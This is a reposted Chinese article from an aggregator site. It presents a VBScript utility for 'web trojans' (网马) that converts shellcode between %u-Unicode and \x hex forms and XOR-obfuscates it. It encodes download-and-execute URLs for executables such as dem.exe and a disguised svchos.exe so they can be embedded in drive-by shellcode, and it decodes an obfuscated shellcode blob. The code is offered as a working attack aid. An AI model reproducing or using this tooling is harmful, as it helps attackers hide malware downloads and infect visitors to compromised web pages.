网马Unicode的一些转换(有bug)[网络技术]
本文“网马Unicode的一些转换(有bug)[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
code="%u5549%u5155%u0E1B%u560E%u5656%u520F%u494E%u0F54%u4E42%u0E4C%u0F10%u5944%u0044"
function replaceregex(str) '正则Unicode转16进制
Sstr=Replace(str,"%u","")
set regex=new regExp
regex.pattern="(..)(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(Sstr,"$2$1")
replaceregex=matches
end Function
function replaceu(str) '\x16进制的shellcode转Unicode
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceu=matches
end Function
Function xor_Hex2Str(hexStr,n) '复原成未加密的\x情势
Dim sstr,hextmp
For i = 1 To Len(hexStr) step 2
hexTmp = Mid(hexStr,i,2)
b=hex(CLng("&h" & hexTmp) Xor n )
If Len(b) = 1 Then b = "0" & b
If hexTmp <> "00" Then
sstr = sstr & "\x" & b
End if
Next
xor_Hex2Str = sstr
End Function
Function Xor_Str2Hex(strHex,n) '转成已加密的\x情势
Dim sHex
k=Split(strHex,"\x")
For i = 1 To ubound(k)
b=hex(CLng("&h" & k(i)) Xor n )
If Len(b) = 1 Then b = "0" & b
sstr=sstr & "\x" & b
Next
Xor_Str2Hex=sstr
End Function
Function Xor_ascii2Hex(strHex,n) 'ascc字符转16进制异或
Dim sHex
For i = 1 To Len(strHex)
b=Hex(Asc(Mid(strHex,i,1)) Xor n)
If Len(b) = 1 Then b = "0" & b
sHex = sHex &"\x"& b
Next
ascii2Hex=sHex
If UBound(split(ascii2Hex,"\x")) Mod 2 <> 0 Then ascii2Hex=ascii2Hex & "\x00" '我是补的00
Xor_ascii2Hex = ascii2Hex
End Function
Function Hex2Str(hexStr,n) '\xshellcode转字符
Dim sstr,hextmp
For i = 1 To Len(hexStr) step 2
hexTmp = Mid(hexStr,i,2)
If hexTmp <> "00" Then
sstr = sstr & Chr(CLng("&h" & hexTmp) Xor n)
End If
Next
Hex2Str = sstr
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("b.txt",8,true)
fileS.writeline "=============开始======================"
fileS.writeline xor_Hex2Str(replaceregex(code),&hbd) 'Unicode转成16进制,异或解密
fileS.writeline "==============完毕====================="
fileS.writeline "=============开始======================"
fileS.writeline Xor_Str2Hex(xor_Hex2Str(replaceregex(code),&hbd),&hbd) '16进制shellcode异或加密
fileS.writeline "=============完毕======================"
fileS.writeline "=============开始======================"
fileS.writeline Xor_ascii2Hex("http://87487575.com/dem.exe",&h21) 'ascc字符转16进制异或
fileS.writeline "=============完毕======================"
fileS.writeline "=============开始======================"
fileS.writeline replaceu(Xor_ascii2Hex("http://www.tehor.org/svchos.exe",&hbd)) 'ascc字符转16进制异或再转unicode 有bug .假如url长度是单数就不行.我补00了
fileS.writeline "=============完毕======================"
fileS.writeline "=============完毕======================"
fileS.writeline Hex2Str(replaceregex("%uC9D5%ucdc9%u9287%u8592%u898A%u8A85%u8A88%u9388%uD2DE%u92D0%uD8D9%ud2d0%ud893%ud8c5"),&hBD) 'unicode异或解密解到ascc字符
fileS.writeline "=============完毕======================"
files.close
set fso=Nothing
以上是“网马Unicode的一些转换(有bug)[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |